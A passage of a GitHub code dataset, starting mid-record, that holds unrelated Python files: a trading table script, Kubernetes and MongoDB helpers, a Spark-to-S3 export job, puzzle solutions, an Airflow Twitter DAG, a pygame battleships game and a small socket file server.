terms.items():\n\n results.append(\n process_records(\n recs,\n contract_id,\n precision,\n print_recs\n )\n )\n\n print(start, \"\\t\", end, \"\\n\")\n\n print(\n \"contract_id\".ljust(FIELD_WIDTH),\n \"chg\".ljust(FIELD_WIDTH),\n \"chg %\".ljust(FIELD_WIDTH),\n \"count\".ljust(FIELD_WIDTH),\n \"at_bid\".ljust(FIELD_WIDTH),\n \"at_ask\".ljust(FIELD_WIDTH),\n \"delta\".ljust(FIELD_WIDTH),\n \"delta_pct\"\n \"\\n\"\n )\n\n for res in results:\n\n contract_id, start_price, end_price, count, at_bid, at_ask = res\n \n chg = f\"{end_price - start_price: 0.{precision}f}\"\n chg_pct = f\"{((end_price / start_price - 1) * 100): 0.2f}%\"\n delta = -at_bid + at_ask\n delta_pct = None\n\n try:\n \n delta_pct = f\"{delta / count * 100: 0.2f}%\" \n \n except:\n\n # divide by zero\n\n pass\n\n print(\n contract_id.ljust(FIELD_WIDTH),\n chg.ljust(FIELD_WIDTH),\n chg_pct.ljust(FIELD_WIDTH),\n str(count).ljust(FIELD_WIDTH),\n str(at_bid).ljust(FIELD_WIDTH),\n str(at_ask).ljust(FIELD_WIDTH),\n str(delta).ljust(FIELD_WIDTH),\n delta_pct.ljust(FIELD_WIDTH)\n )","repo_name":"toobrien/intraday","sub_path":"charts/term_chg_table.py","file_name":"term_chg_table.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74306365880","text":"import six\r\n\r\nfrom repository.common.type import Kubernetes, Metric, NetStat, Common\r\n# from repository.model.common.delete import DeleteModel\r\nfrom repository.model.k8s.daemonset import DaemonSet\r\nfrom repository.model.k8s.deployment import Deployment\r\nfrom repository.model.k8s.namespace import Namespace\r\nfrom repository.model.k8s.node import Node\r\nfrom repository.model.k8s.pod import Pod\r\nfrom repository.model.k8s.service import Service\r\nfrom repository.model.metric.endpoint import EndpointNetworkMetric\r\nfrom repository.model.metric.multi_cluster import MultiClusterMetric\r\nfrom repository.model.metric.node import NodeMetric\r\nfrom repository.model.netstat.multi_cluster import MultiClusterNetwork\r\nfrom repository.model.netstat.service import MultiClusterService, ServiceExport, ServiceImport\r\n\r\n\r\nclass EventObject:\r\n \"\"\"\r\n class for event transfer object\r\n \"\"\"\r\n\r\n fields = {\r\n 'event_type': 'str',\r\n 'object_type': 'str',\r\n 'object_value': 'object',\r\n }\r\n\r\n event_type = None\r\n object_type = None\r\n object_value = None\r\n\r\n def __init__(self, event_type, object_type, object_value):\r\n \"\"\"\r\n EventObject()\r\n :param event_type:\r\n (str) a Enum in class cluster.common.type.Event(Enum)\r\n :param object_type:\r\n (str) class(Enum)'s value in class cluster.repository.common.type\r\n :param object_value:\r\n \"\"\"\r\n self.event_type = event_type\r\n self.object_type = object_type\r\n self.object_value = object_value\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.fields):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n return result\r\n\r\n @classmethod\r\n def to_object(cls, _dict):\r\n # todo: test\r\n # check repository.common.type.Kubernetes(Enum)\r\n if _dict['object_type'] == Kubernetes.NODE.value:\r\n obj = Node.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.POD.value:\r\n obj = Pod.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.NAMESPACE.value:\r\n obj = Namespace.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.DEPLOYMENT.value:\r\n obj = Deployment.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.DAEMONSET.value:\r\n obj = DaemonSet.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.NAMESPACE.value:\r\n obj = Namespace.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.SERVICE.value:\r\n obj = Service.to_object(_dict['object_value'])\r\n\r\n # check repository.common.type.Metric(Enum)\r\n elif _dict['object_type'] == Metric.NODE_METRIC.value:\r\n obj = NodeMetric.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Metric.MULTI_CLUSTER_METRIC.value:\r\n obj = MultiClusterMetric.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.MULTI_CLUSTER_NETWORK.value:\r\n obj = MultiClusterNetwork.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.MULTI_CLUSTER_SERVICE.value:\r\n obj = MultiClusterService.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.SERVICE_EXPORT.value:\r\n obj = ServiceExport.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.SERVICE_IMPORT.value:\r\n obj = ServiceImport.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Metric.ENDPOINT_NETWORK_METRIC.value:\r\n obj = EndpointNetworkMetric.to_object(_dict['object_value'])\r\n\r\n else:\r\n raise TypeError('Invalid value. Not defined in cluster.repository.model.common.type')\r\n\r\n return EventObject(event_type=_dict['event_type'],\r\n object_type=_dict['object_type'],\r\n object_value=obj)\r\n","repo_name":"krunivs/gw_agent","sub_path":"cluster/event/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2619547217","text":"\"\"\"alfredyang@pharbers.com.\n\nThis is job template for Pharbers Max Job\n\"\"\"\n\nfrom phcli.ph_logs.ph_logs import phs3logger, LOG_DEBUG_LEVEL\n\n\ndef execute(**kwargs):\n logger = phs3logger(kwargs[\"run_id\"], LOG_DEBUG_LEVEL)\n spark = kwargs['spark']\n\n data_frame = kwargs['df_input']\n dataType = kwargs['dataType']\n tempArgs = kwargs['tempArgs']\n glueArgs = kwargs['glueArgs']\n out_path = kwargs['out_path']\n out_encoding = kwargs['out_encoding']\n out_filenum = kwargs['out_filenum']\n\n # 输入参数\n '''\n {\n \"dataType\": \"temp/glue\",\n \"tempArgs\": {\n \"projectName\": \"autorawdata\",\n \"table\": \"union_raw_data\",\n \"version\": [\"autorawdata_autorawdata_developer_2022-07-25T09:40:23+00:00_李宇轩\"]\n },\n \"glueArgs\": {\n \"table\": \"mkt_mapping\",\n \"version\": [\"奥鸿_20210623\"]\n },\n \"out_path\": \"s3://ph-max-auto/v0.0.1-2020-06-08/data_download/union_raw_data.csv\",\n \"out_encoding\":\"utf-8/GBK\",\n \"out_filenum\":\"1\"\n }\n '''\n\n\n import os\n import pandas as pd\n from pyspark.sql.types import StringType, IntegerType, DoubleType, StructType, StructField\n from pyspark.sql import functions as func \n import json\n import boto3\n from pyspark.sql.functions import lit, col, struct, to_json, json_tuple\n from functools import reduce\n\n\n def convert_union_schema(df):\n # 对多TraceId取Schema的col的并集\n rows = df.select(\"schema\").distinct().collect()\n return list(reduce(lambda pre, next: set(pre).union(set(next)), list(map(lambda row: [schema[\"name\"] for schema in json.loads(row[\"schema\"])], rows)) ))\n\n def convert_normal_df(df, cols):\n # 将统一Schema的DF转成正常的DataFrame\n return df.select(json_tuple(col(\"data\"), *cols)) \\\n .toDF(*cols)\n\n def getTempData(projectName, table, version):\n # 读取中间文件数据\n projectId={\"autorawdata\":\"99a5R2kIMyInYEc\", \"automax\":\"s7nBDbpqfUShq1w\", \"autoweight\":\"xu68bxmMFJo6-o9\", \"autorffactor2\":\"2LWyqFPIIwCSZEV\", \"cmax\":\"ZyQpzttbwmvQcCf\"}\n projectPath=f\"s3://ph-platform/2020-11-11/lake/pharbers/{projectId[projectName]}/{table}\"\n print(projectPath)\n df = spark.read.parquet(projectPath) \\\n .where(col('traceId').isin(version))\n dfout = convert_normal_df(df, convert_union_schema(df))\n if dfout.count() < 0:\n raise ValueError(\"数据为空\")\n return dfout\n\n def getGlueData(table, version):\n projectId=\"zudIcG_17yj8CEUoCTHg\"\n data_path=f\"s3://ph-platform/2020-11-11/lake/pharbers/{projectId}/{table}\"\n df = spark.read.parquet(data_path).where(col('version').isin(version))\n if df.count() < 0:\n raise ValueError(\"数据为空\")\n return df\n\n def writeToS3(df, out_path, out_encoding, out_filenum, out_mode=\"append\"):\n # 写出到3s \n df.repartition(int(out_filenum)) \\\n .write.format(\"csv\").option(\"header\", \"true\").option(\"encoding\", str(out_encoding)) \\\n .mode(out_mode).save(out_path)\n\n # ======== 执行 ======\n # 读取数据\n if dataType == 'temp':\n dfout = getTempData(tempArgs['projectName'], tempArgs['table'], tempArgs['version'])\n elif dataType == 'glue':\n dfout = getGlueData(glueArgs['table'], glueArgs['version'])\n\n dfout.show(2)\n # 写出到S3\n writeToS3(dfout, out_path, out_encoding, out_filenum)\n \n return {\"out_df\": data_frame}\n","repo_name":"PharbersDeveloper/bpmaxdag","sub_path":"phjobs/downloadtos3.py","file_name":"downloadtos3.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7020077873","text":"\"\"\"\r\nLists all children and renames them.\r\n\r\nAuthor: www.LouisRossouw.com\r\n\"\"\"\r\n\r\n\r\n\r\nimport maya.cmds as cmds\r\n\r\n\r\nNEW_NAME = \"machine_geo_\" # add new name here.\r\n\r\nselection = cmds.ls(selection=True)\r\nselection_children = cmds.listRelatives(selection, ad=True)\r\n\r\ncount = 0\r\nfor child in selection_children:\r\n\tcount += 1\r\n\tprint(child)\r\n\tcmds.rename(child, NEW_NAME+ str(count))\r\n \r\n \r\n","repo_name":"LouisRossouw/Maya-tools","sub_path":"scripts/rename_all_children.py","file_name":"rename_all_children.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9502304808","text":"import logging\nimport os\nimport pymongo\nimport time\n\nMONGO_HOST = os.getenv(\"MONGO_HOST\", \"127.0.0.1\")\nMONGO_USERNAME= os.getenv(\"MONGO_USERNAME\", \"admin\")\nMONGO_PASSWORD= os.getenv(\"MONGO_PASSWORD\", \"admin\")\nMONGO_DB_NAME= os.getenv(\"MONGO_DB_NAME\", \"lomo\")\nMONGO_PORT= os.getenv(\"MONGO_PORT\", \"27017\")\n\nclass MongoClient:\n def __init__(self):\n self._mongo_client = pymongo.MongoClient('mongodb://%s:%s@%s:%s' % (MONGO_USERNAME, MONGO_PASSWORD, MONGO_HOST, MONGO_PORT))\n self._db = self._mongo_client[MONGO_DB_NAME]\n logging.basicConfig(level=logging.INFO)\n self._deviceuser_collection = self._db[\"devicesusers\"]\n self._user_collection = self._db[\"users\"]\n \n def get_device_user_token(self, id, token):\n return self._deviceuser_collection.find_one({'_id': id, 'token': token})\n \n def get_device_user(self, id):\n return self._deviceuser_collection.find_one({'_id': id})\n\n def get_user_device(self, id, token):\n device_user = self._deviceuser_collection.find_one({'_id': id, 'token': token})\n if device_user is not None:\n user = self.get_user(device_user[\"userId\"])\n for device in user[\"devices\"]:\n if device['id'] == id:\n return (user, device)\n return (None, None)\n\n def get_device(self, userd_id, device_id):\n user = self.get_user(userd_id)\n for device in user[\"devices\"]:\n if device['id'] == device_id:\n return device\n return None\n\n def get_user(self, user_id):\n return self._user_collection.find_one({'_id': user_id })\n\n def set_last_values(self, user_id, device_id, temp, hum, soil, gas, aqi, rssi):\n self._user_collection.update_one({'_id': user_id, 'devices.id': device_id }, \n { \"$set\": { \n \"devices.$.lastTempValue\": float(temp),\n \"devices.$.lastHumidityValue\": float(hum),\n \"devices.$.lastGasValue\": float(gas),\n \"devices.$.lastSoilValue\": float(soil),\n \"devices.$.lastAqiValue\": float(aqi),\n \"devices.$.lastRssiValue\": float(rssi)\n } })\n\n def set_lastseen_device(self, user_id, device_id):\n epoch_time = int(time.time())\n self._user_collection.update_one({'_id': user_id, 'devices.id': device_id }, { \"$set\": { \"devices.$.lastSeen\": epoch_time } })\n\n def set_device_values(self, user_id, device_id, json):\n self._user_collection.update_one({\n '_id': user_id, \n 'devices.id': device_id \n }, { \n \"$set\": {\n \"devices.$.host\": json.get(\"host\", \"\"),\n \"devices.$.wifiSsid\": json.get(\"wifiSsid\", \"\"),\n \"devices.$.totalMqttPacketCount\": json.get(\"totalMqttPacketCount\", 0),\n \"devices.$.receivedMqttPacketCount\": json.get(\"receivedMqttPacketCount\", 0),\n \"devices.$.totalHttpPacketCount\": json.get(\"totalHttpPacketCount\", 0),\n \"devices.$.receivedHttpPacketCount\": json.get(\"receivedHttpPacketCount\", 0),\n \"devices.$.mqttMeanTime\": json.get(\"mqttMeanTime\", 0),\n \"devices.$.httpMeanTime\": json.get(\"httpMeanTime\", 0)\n }\n })\n","repo_name":"Vallasc/Low-energy-Outdoor-Monitoring","sub_path":"src/proxy/src/mongo_client.py","file_name":"mongo_client.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"33799339758","text":"# 二叉树的镜像\n\nfrom logging import root\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution: # 遍历\n def Mirror(self , pRoot: TreeNode) -> TreeNode:\n self.traverse(pRoot)\n return pRoot\n\n def traverse(self, node):\n if not node:\n return\n \n self.traverse(node.left)\n self.traverse(node.right)\n node.left, node.right = node.right, node.left\n\nclass Solution: # 递归\n def Mirror(self , pRoot: TreeNode) -> TreeNode:\n # func定义:将��� root 为根的这棵二叉树翻转,返回翻转后的二叉树的根节点\n if not pRoot:\n return\n \n left = self.Mirror(pRoot.left)\n right = self.Mirror(pRoot.right)\n pRoot.left, pRoot.right = right, left\n return pRoot\n","repo_name":"wenshuojie/Algorithm-progress","sub_path":"剑指101/BM33.py","file_name":"BM33.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40491061829","text":"import sys\nimport yaml\nimport transaction\nfrom argparse import ArgumentParser\nfrom gettext import translation\nfrom pyramid.paster import get_app\nfrom sqlalchemy import func\n\n\ndef main():\n parser = ArgumentParser(\n prog=sys.argv[0], add_help=True,\n description=\"Tool to fill the tsearch table (Full-Text Search) \"\n \"from the theme informations.\",\n )\n\n parser.add_argument(\n \"--interfaces\",\n nargs='+',\n required=True,\n help=\"the interfaces to export\",\n )\n parser.add_argument(\n \"--duplicate-name\",\n action=\"store_true\",\n dest=\"name\",\n help=\"allows to add a name more than one time,\\n\"\n \"by default if we find more than one element with the same name \"\n \"only one will be imported\",\n )\n parser.add_argument(\n \"--no-themes\",\n action=\"store_false\",\n dest=\"themes\",\n help=\"don't import the themes\",\n )\n parser.add_argument(\n \"--no-blocks\",\n action=\"store_false\",\n dest=\"blocks\",\n help=\"don't import the blocks (first level layer groups)\",\n )\n parser.add_argument(\n \"--no-folders\",\n action=\"store_false\",\n dest=\"folders\",\n help=\"don't import the folders (tree folders)\",\n )\n parser.add_argument(\n \"--no-layers\",\n action=\"store_false\",\n dest=\"layers\",\n help=\"don't import the layers (tree leaf)\",\n )\n parser.add_argument(\n \"--package\",\n help=\"the application package\",\n )\n parser.add_argument(\n \"-i\", \"--app-config\",\n default=\"production.ini\",\n dest=\"app_config\",\n help=\"the application .ini config file (optional, default is 'production.ini')\"\n )\n parser.add_argument(\n \"-n\", \"--app-name\",\n default=\"app\",\n dest=\"app_name\",\n help=\"the application name (optional, default is 'app')\"\n )\n options = parser.parse_args()\n\n app_config = options.app_config\n app_name = options.app_name\n if app_name is None and \"#\" in app_config:\n app_config, app_name = app_config.split(\"#\", 1)\n get_app(app_config, name=app_name)\n\n Import(options)\n\n\nclass Import:\n def __init__(self, options):\n self.options = options\n self.imported = set()\n\n settings = {}\n with open(\".build/config.yaml\") as f:\n settings = yaml.load(f)\n\n self.fts_languages = settings[\"fulltextsearch\"][\"languages\"]\n self.languages = settings[\"available_locale_names\"]\n\n # must be done only once we have loaded the project config\n from c2cgeoportal.models import DBSession, FullTextSearch, Interface, Theme, Role\n\n self.session = DBSession()\n self.session.execute(FullTextSearch.__table__.delete().where(FullTextSearch.from_theme == True)) # noqa\n\n self._ = {}\n for lang in self.languages:\n self._[lang] = translation(\"demo-server\", \"demo/locale/\", [lang])\n\n self.interfaces = self.session.query(Interface).filter(\n Interface.name.in_(options.interfaces)\n ).all()\n\n self.public_theme = {}\n self.public_group = {}\n for interface in self.interfaces:\n self.public_theme[interface.id] = []\n self.public_group[interface.id] = []\n\n for theme in self.session.query(Theme).filter_by(public=True).all():\n self._add_theme(theme)\n\n for role in self.session.query(Role).all():\n for theme in self.session.query(Theme).all():\n self._add_theme(theme, role)\n\n transaction.commit()\n\n def _add_fts(self, item, interface, action, role):\n from c2cgeoportal.models import FullTextSearch\n\n key = (\n item.name if self.options.name else item.id,\n interface.id,\n role.id if role is not None else None\n )\n if key not in self.imported:\n self.imported.add(key)\n for lang in self.languages:\n fts = FullTextSearch()\n fts.label = self._[lang].gettext(item.name)\n fts.role = role\n fts.interface = interface\n fts.lang = lang\n fts.public = role is None\n fts.ts = func.to_tsvector(self.fts_languages[lang], fts.label)\n fts.actions = [{\n \"action\": action,\n \"data\": item.name,\n }]\n fts.from_theme = True\n self.session.add(fts)\n\n def _add_theme(self, theme, role=None):\n fill = False\n for interface in self.interfaces:\n if interface in theme.interfaces:\n for child in theme.children:\n fill = self._add_block(child, interface, role) or fill\n\n if fill and self.options.themes:\n if role is None:\n self.public_theme[interface.id].append(theme.id)\n\n if role is None or theme.id not in self.public_theme[interface.id]:\n self._add_fts(theme, interface, \"add_theme\", role)\n\n def _add_block(self, group, interface, role):\n return self._add_group(group, interface, self.options.blocks, role)\n\n def _add_folder(self, group, interface, role):\n return self._add_group(group, interface, self.options.folders, role)\n\n def _add_group(self, group, interface, export, role):\n from c2cgeoportal.models import LayerGroup\n\n fill = False\n for child in group.children:\n if isinstance(child, LayerGroup):\n fill = self._add_folder(child, interface, role) or fill\n else:\n fill = self._add_layer(child, interface, role) or fill\n\n if fill and export:\n if role is None:\n self.public_group[interface.id].append(group.id)\n\n if role is None or group.id not in self.public_group[interface.id]:\n self._add_fts(group, interface, \"add_group\", role)\n\n return fill\n\n def _layer_visible(self, layer, role):\n for restrictionarea in layer.restrictionareas:\n if role in restrictionarea.roles:\n return True\n return False\n\n def _add_layer(self, layer, interface, role):\n from c2cgeoportal.models import LayerV1\n\n if isinstance(layer, LayerV1):\n return False\n\n if role is None:\n fill = layer.public and interface in layer.interfaces\n else:\n fill = interface in layer.interfaces and not layer.public and \\\n self._layer_visible(layer, role)\n\n if fill and self.options.layers:\n self._add_fts(layer, interface, \"add_layer\", role)\n\n return fill\n","repo_name":"craxxkid/c2cgeoportal","sub_path":"c2cgeoportal/scripts/theme2fts.py","file_name":"theme2fts.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"386080483","text":"import os\n\n\ndef readInput(filename: str):\n\n script_location = os.path.dirname(os.path.realpath(__file__))\n input_file_path = os.path.join(script_location, filename)\n\n with open(input_file_path, 'r') as f:\n coordinates = [*enumerate(int(i) for i in f)]\n return coordinates\n\n\ndef mix(coordinates, times=1):\n numbers = list(coordinates)\n numbers_length = len(coordinates)\n\n for _ in range(times):\n for coordinate in coordinates:\n idx = numbers.index(coordinate)\n item = numbers.pop(idx)\n new_idx = (idx + item[1]) % len(numbers)\n numbers.insert(new_idx, item)\n\n for zero_idx, coordinate in enumerate(numbers):\n _, val = coordinate\n if val == 0:\n break\n\n result = numbers[(zero_idx + 1000) % numbers_length][1]\n result += numbers[(zero_idx + 2000) % numbers_length][1]\n result += numbers[(zero_idx + 3000) % numbers_length][1]\n\n return result\n\n\ndef part1(inputFile: str):\n coordinates = readInput(inputFile)\n return mix(coordinates)\n\n\ndef part2(inputFile: str):\n coordinates = readInput(inputFile)\n decryption_key = 811589153\n coordinates = [(idx, val * decryption_key) for idx, val in coordinates]\n return mix(coordinates, times=10)\n\n\ndef test():\n print('---- TEST ----')\n filename = 'test_input.txt'\n\n assert part1(filename) == 3\n print('Part 1 OK')\n\n assert part2(filename) == 1623178306\n print('Part 2 OK')\n\n\ndef main():\n print('\\n---- MAIN ----')\n filename = 'input.txt'\n\n solution_part1 = part1(filename)\n print(f'Solution for Part 1: {solution_part1}')\n assert solution_part1 == 3346\n\n solution_part2 = part2(filename)\n print(f'Solution for Part 2: {solution_part2}\\n')\n assert solution_part2 == 4265712588168\n\n\nif __name__ == '__main__':\n test()\n main()\n","repo_name":"siimveske/AOC","sub_path":"2022/day20/day_20_grove_positioning_system.py","file_name":"day_20_grove_positioning_system.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73575295799","text":"\"\"\"\nCode that goes along with the Airflow tutorial located at:\nhttps://github.com/apache/incubator-airflow/blob/master/airflow/example_dags/tutorial.py\n\"\"\"\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator, BranchPythonOperator\nfrom datetime import datetime, timedelta\n\n\nargs = {\n 'owner': 'yen',\n 'depends_on_past': False,\n 'start_date': datetime.now()\n}\n\n#dag = DAG('etl_app_V3', default_args=args)\n\n\n\n# -----------------------------------\n# job func \n\nfrom twython import Twython\nimport time\nimport os \n\ntry:\n APP_KEY = os.environ['APP_KEY']\n APP_SECRET = os.environ['APP_SECRET'] \nexcept:\n print (' No API key , please set up via : ')\n print (' https://developer.twitter.com/en/apps')\n\ndef main():\n twitter = Twython(APP_KEY, APP_SECRET, oauth_version=2)\n ACCESS_TOKEN = twitter.obtain_access_token()\n print (ACCESS_TOKEN) \n ACCESS_TOKEN = ACCESS_TOKEN\n twitter = Twython(APP_KEY, access_token=ACCESS_TOKEN)\n twitter.get_application_rate_limit_status()['resources']['search']\n #RETRIEVING REAL TIME STREAMING TWEETS ABOUT BLOCKCHAIN \n search = twitter.search(q=\"blockchain\", count=2000)\n tweets = search['statuses']\n #for tweet in tweets:\n #print (tweet['id_str'], '\\n', tweet['text'], tweet['favorite_count'], tweet['retweet_count'] ), '\\n\\n\\n'\n ids = []\n #for tweet in tweets:\n #ids.append(tweet['id_str'])\n ids = [tweet['id_str'] for tweet in tweets]\n texts = [tweet['text'] for tweet in tweets]\n times = [tweet['retweet_count'] for tweet in tweets]\n favtimes = [tweet['favorite_count'] for tweet in tweets]\n follower_count = [tweet['user']['followers_count'] for tweet in tweets]\n location = [tweet['user']['location'] for tweet in tweets]\n lang = [tweet['lang'] for tweet in tweets]\n print (tweets[0])\n return tweets\n\n# -----------------------------------\n\n\n\n\nwith DAG('etl_job_V2', default_args=args) as dag:\n superman_task = PythonOperator(\n task_id='main',\n python_callable=main\n )\n\n\n\n","repo_name":"yennanliu/twitter_real_time_pipeline","sub_path":"archive/etl_job_V2.py","file_name":"etl_job_V2.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9907378460","text":"\"\"\" Program to printout names of parties and their vote counts\r\nMazwi Myeza\r\n21 April 2014\r\nAssignment6\r\nQuestion3\r\n\"\"\"\r\n#Creating arrays and printing heading\r\nvotes = []\r\nparties = []\r\npartyVotes = []\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\n#Asking user for input and storing it in the created array\r\nvote = input(\"Enter the names of parties (terminated by DONE):\\n\")\r\ncounter = 0\r\nwhile vote != 'DONE':\r\n votes.append(vote)\r\n counter += 1\r\n vote = input()\r\n#sorting votes \r\nvotes.sort() \r\n#populating an array for the parties voted for\r\nfor i in range(counter):\r\n if votes[i] in parties:\r\n None\r\n else:\r\n parties.append(votes[i])\r\n#populating an array for the number of votes a party has recieved\r\ncount = 0 \r\nfor j in range(len(parties)):\r\n count = votes.count(parties[j])\r\n partyVotes.append(count)\r\nprint() \r\nprint(\"Vote counts:\")\r\n#printing results in the proper format\r\nfor k in range(len(parties)):\r\n f = \"{0:<11}\".format(parties[k])\r\n print(f, partyVotes[k], sep =\"- \")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/myzmaz001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9082247860","text":"import pygame\nimport numpy as np\nimport random as rand\nfrom Source import UI_functions as UI\nfrom Source import battleships_functions_play as play\n\ndef Play_Game(screen, bg, Bmap1, Bmap2, cfg):\n \n #Init\n font_s = pygame.font.Font(\"Assets/Font/impact.ttf\", 26)\n font = pygame.font.Font(\"Assets/Font/impact.ttf\", 40)\n grid = pygame.image.load(\"Assets/Images/WhiteGrid.png\")\n square = pygame.image.load(\"Assets/Images/Square.png\")\n screen, bg = UI.Update_Screen_Values(screen, bg)\n pygame.time.Clock().tick(cfg[\"Basic\"].getint(\"FPS\"))\n\n #Initial Values\n CLICK = False\n RUNNING = True\n play.load_config_file(cfg)\n rect_map = UI.Rect_Player_AI_Map()\n rects, images_pos, text_pos = UI.Rect_Play()\n choose = rand.randint(0,1)\n texts = [font.render(cfg[\"Text\"][\"AI1\"], True, (255, 255, 255)), \n font.render(cfg[\"Text\"][\"AI2\"], True, (255, 255, 255)),\n font.render(cfg[\"Text\"][\"SCORE\"], True, (255, 255, 255)),\n font.render(str(cfg[\"Points\"].getint(\"AI1_PTS\")) + \" - \" + str(cfg[\"Points\"].getint(\"AI2_PTS\")), True, (255, 255, 255)),\n font_s.render(\"χ\", True, (52, 52, 54))]\n images = [square]\n \n AI1 = play.PlayBot(Bmap1, cfg[\"Basic\"].getint(\"ALG2\"))\n AI2 = play.PlayBot(Bmap2, cfg[\"Basic\"].getint(\"ALG1\"))\n shoot = True\n \n #InGame\n while RUNNING:\n \n #Screen properties per update\n mx, my = pygame.mouse.get_pos()\n screen.blit(bg,(0,0))\n\n #Draw functions \n UI.Draw_Left_Map_Play(screen, Bmap1, grid)\n UI.Draw_Right_Map_Play(screen, Bmap2, grid)\n UI.Draw_Pos(screen, images, images_pos)\n UI.Draw_Pos(screen, texts, text_pos)\n \n #Clickable buttons \n if rects[0].collidepoint((mx,my)) and CLICK:\n return True\n \n if shoot and choose in [0,2]:\n choose = 2\n AI1.AI_shot()\n if (1 in AI1.Map) == False:\n cfg.set(\"Points\",\"AI2_PTS\",str(cfg[\"Points\"].getint(\"AI2_PTS\") + 1))\n texts[3] = font.render(str(cfg[\"Points\"].getint(\"AI1_PTS\")) + \" - \" + str(cfg[\"Points\"].getint(\"AI2_PTS\")), True, (255, 255, 255))\n shoot = False\n \n if shoot and choose in [1,2]:\n choose = 2\n AI2.AI_shot()\n if (1 in AI2.Map) == False:\n cfg.set(\"Points\",\"AI1_PTS\",str(cfg[\"Points\"].getint(\"AI1_PTS\") + 1))\n texts[3] = font.render(str(cfg[\"Points\"].getint(\"AI1_PTS\")) + \" - \" + str(cfg[\"Points\"].getint(\"AI2_PTS\")), True, (255, 255, 255))\n shoot = False\n \n #Events and update\n pygame.display.update()\n\n CLICK = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n RUNNING = False\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n CLICK = True\n return cfg, False","repo_name":"Dorthion/Python-Minigames","sub_path":"Battleships/Source/Play_ai_ai_game.py","file_name":"Play_ai_ai_game.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73557040760","text":"from socket import *\r\nfrom threading import *\r\nimport sys\r\nimport string\r\nimport keyboard\r\nimport sys\r\nimport os\r\nimport glob\r\n\r\n\r\ndef listen(tecla): \r\n while True:\r\n keyboard.wait(tecla)\r\n print (\"Servidor finalizado\")\r\n sys.exit()\r\n \r\n\r\n \r\n\r\nthreads = [Thread(target=listen, kwargs={\"tecla\":chr(27)})]\r\nfor thread in threads:\r\n thread.start()\r\n \r\n \r\n\r\n\r\nhost = 'localhost'\r\nport = 8080\r\nmysocket = socket(AF_INET,SOCK_STREAM)\r\nmysocket.bind((host,port))\r\nmysocket.listen(5)\r\nmy_dir = \"D:\\\\Estudos\\\\Sistemas Distribuidos\\\\Projeto Server-Client\\\\\"\r\n\r\n\r\n\r\nwhile True:\r\n print(\"Servidor iniciado, aguardando conexão.\")\r\n print(\"Precione a tecla 'ESC' para sair.\")\r\n\r\n conexao, endereco = mysocket.accept()\r\n print('Server conectado por', endereco)\r\n \r\n data = conexao.recv(1024)\r\n print(\"Dado recebido \", data.decode())\r\n if data.decode() == \"-list\":\r\n os.chdir(my_dir)\r\n for file in glob.glob(\"*.*\"):\r\n size_file = os.path.getsize(file)\r\n msg_send = file + \" \"+str(size_file)\r\n print(\"\",end=\" \")\r\n conexao.send(str.encode(msg_send))\r\n else:\r\n file_search = data.decode()\r\n arq = open(file_search, 'rb')\r\n size = os.path.getsize(file_search)\r\n try:\r\n conexao.send(str.encode(str(size))) \r\n for i in arq.readlines():\r\n conexao.send(i)\r\n except:\r\n print(\"Erro ao estabelecer a comunicação com o cliente!\")\r\n 